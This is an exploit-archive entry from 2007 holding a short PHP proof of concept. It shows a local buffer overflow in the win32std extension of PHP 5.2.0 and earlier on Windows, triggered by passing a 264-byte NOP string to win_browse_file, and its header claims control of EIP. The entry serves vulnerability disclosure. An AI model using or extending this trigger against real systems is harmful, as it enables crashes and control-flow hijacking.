PHP <= 5.2.0 (php_win32sti) Local Buffer Overflow PoC (win32)

2007-08-18 00:00:00

<?php
// ==================================================================================
//
// php_win32sti.dll PHP <= 5.2.0 (win32) Buffer Overflow
//
// [x] Discovery: boecke <[email protected]>
// [x] Risk: Local Buffer Overflow (Medium - High Risk)
// [x] Notes: EDX and EIP are able to be controlled and therefore
// have the potential to dictate program flow.
//
// [x] "Sangre, sonando, de rabia naci.. Who do you trust?"
//
// ==================================================================================

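// The PoC only applies when the win32std extension is loaded.
if ( !extension_loaded("win32std") )
{
    die;
}

// The 264-byte third argument is the oversized input that triggers the overflow.
win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );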

?>


Fixes

No fixes
